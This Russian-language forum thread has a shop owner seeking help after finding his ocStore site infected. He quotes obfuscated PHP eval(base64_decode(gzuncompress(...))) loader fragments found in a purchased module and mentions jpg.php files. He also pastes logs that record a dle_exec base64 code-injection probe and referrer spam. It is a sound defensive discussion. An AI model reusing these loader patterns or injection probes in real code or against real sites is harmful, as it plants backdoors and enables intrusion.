Каждый день вредоносный код(((

[pashast]

Хостер случайно не таймвеб?

 

За последнюю неделю уже 2й случай заражанея на этом хостинге

[hitball]

agropuls, да с первого раза все норм.

pashast, нет, другой хостер

[Stels32]

А у меня тож интересный вопрос
Появились логи говорящие о хак атаках
начал копаться
вот че нарыл
причем находится все это в файлах официально купленного модуля на данном форуме
Подскажите, пожалуйста, это нормально или с эти надо бороться?
Автору модуля, пока не писал, хочу услышать общественность.

T3FUO+Z+bm1WKASqbgNkIEWV8tntBQA7Jpj0qb89LYEIS6IArjZNdqkR+v33dfv78A9B4IPA=";eval( base64_decode(gzuncompress(base64_decode($Q54ACFE96BAA0BF949075E2A19100128E))))

 

/7Rcu3STX7vWXG49zIiJIVoNJIX2ClMfW4yZDYkORsKkWNlmPgPgckRXNSa7nbP3xz0/ykx+i";eval( base64_decode(gzuncompress(base64_decode($Q76CB6D5EB07652499F17736759C56EDF))))

 

zNT+Gs8OOsH/u+3ckMmZQ/n6PywTOtxyd2QH2TIIM5VBDGh0LMx/Z/T/fP//zP/8Liph1Qg==";eval( base64_decode(gzuncompress(base64_decode($Q634D7AE1BF41FA3EC9676FC83EE3753D))))

[Stels32]

Вычистил папку download от непонятного барахла
терь вкумод ругается

 

2015-06-26 17:41:34 - PHP Warning:  fopen(/home/i/infostoj/stels32.ru/public_html/download/test): failed to open stream: Permission denied in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 111

2015-06-26 17:41:34 - PHP Warning:  fwrite() expects parameter 1 to be resource, boolean given in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 113

2015-06-26 17:41:34 - PHP Warning:  fclose() expects parameter 1 to be resource, boolean given in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 115

2015-06-26 17:41:34 - PHP Warning:  sprintf(): Too few arguments in /home/i/infostoj/stels32.ru/public_html/vqmod/vqcache/vq2-admin_controller_common_home.php on line 118

 

не находит файлик test

а AI BOLIT на него ругался при проверке

Змінено 26 червня 2015 користувачем Stels32

[afwollis]

что за модуль-то?

если simplecheckout - возможно, это упакованные базовые настройки.

ругается не vqmod, а движок.

проверяя наличие корректных прав на директории. и не находя.

что там "AI BOLIT" хотел - нам не известно.

[Stels32]

модуль разметки Microdata

а в папке download вообще должны быть какие-то файлы???

потому что там лежали очень подозрительные двойного расширения jpg.php.

и именами типа 

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

1264

и тд и тп

и в корневом каталоге был файл mysql.php с частично закрытым кодом

[halfhope]

Нет, каталог download должен быть пуст. Если есть лишние файлы, то магазин был взломан и заражен.

[afwollis]

что за "Microdata"?

по "download" halfhope выше написал.

[Stels32]

что за "Microdata"?

по "download" halfhope выше написал.

Микроразметка + ОСТРОВА в YANDEX2.1 автор заверил что все нормально

 

 

Здравствуйте. Да, могут ругаться. Они часто ругаются на обфурсцированные(закодированные) скрипты. Так что это нормально. Ради собственного спокойствия можете скачать на форуме модуль и заменить необходимые файлы. Вирусов там точно никаких нет. Могу также ключ продублировать.

 

а вирусдай ругается 

Обнаружены заражения следующих типов:

h.ExternalRedirect.

 

 

 

завтра планировал оплатить год обслуживания у них

[afwollis]

автор заверил что все нормально

ясн.

так и есть.

...а вирусдай ругается...

что-что?..

мысли собери - по ссылке речь о .htaccess

[Stels32]

ясн.

так и есть.

что-что?..

мысли собери - по ссылке речь о .htaccess

перепроверил все имеющиеся .htaccess никаких редиректов нет

[laim731]

Stels32

Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда.

[Stels32]

Stels32

Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда.

 

Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. 

[Stels32]

Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. 

Проблему с ошибкой решил.

Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше

[halfhope]

Проблему с ошибкой решил.

Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше

 

Если не поможет - обращайтесь.

[afwollis]

...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...

не "не находит", а "не может создать".

ocStore проверяет права на директории.

если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права.

[Stels32]

Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая

 

2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1
Error No: 1064
SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49
2015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1
Error No: 1064
SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49
2015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1
Error No: 1064
SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49

 

закидывал в гугл запрос типа \

Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE '

ничего не выдает

 

до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе

только в ней было конкретно указано на характерную для хака кодировку

 

2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE
'index.php?dle_exec=print+base64_decode(\'' at line 1
Error No:
1064
SELECT * FROM `url_redirect` WHERE `oldurl` LIKE
'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR
`oldurl` LIKE
'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR
`oldurl` LIKE
'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in

 

теперь совсем в растерянности

[Stels32]

кто подскажет (взято из access.log)

что это означает редирект или идет ссылка на данные ресурсы?
Заранее спасибо!

/detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net/
/detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/"
"GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/"
"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/"
"GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/"

 

[afwollis]

зависит от формата лога.

скорее всего "С данных ресурсов"

"метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)"

[Stels32]

зависит от формата лога.

скорее всего "С данных ресурсов"

"метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)"

А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают

 

"зависит от формата лога" а как узнать его формат?